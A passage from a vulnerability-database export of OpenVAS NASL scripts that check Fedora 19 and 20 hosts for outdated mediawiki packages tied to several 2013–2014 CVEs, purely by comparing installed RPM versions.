"2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867776", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5691\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867776\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:10:21 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5691\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5691\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5684", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867788", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867788", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5684\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867788\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:11:11 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5684\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5684\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:16", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-11727", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868360", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-11727\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868360\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-07 06:03:17 +0200 (Tue, 07 Oct 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-7199\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-11727\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11727\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140014.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.4~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:46", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16033", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868575", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16033\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868575\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:06:19 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16033\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16033\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145969.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:33", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-30T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17228", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17228\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868642\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:58:06 +0100 (Tue, 30 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17228\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17228\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147173.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-11582", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868361", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868361", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-11582\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868361\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-07 06:03:40 +0200 (Tue, 07 Oct 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-7199\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-11582\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11582\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140008.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.4~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:21", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-15T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-12263", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868401", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12263\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868401\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:42 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12263\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12263\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:17", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16020", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868570", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868570", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16020\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868570\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:00:00 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16020\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16020\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145910.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-15T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-12262", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868400", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12262\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868400\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:20 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", 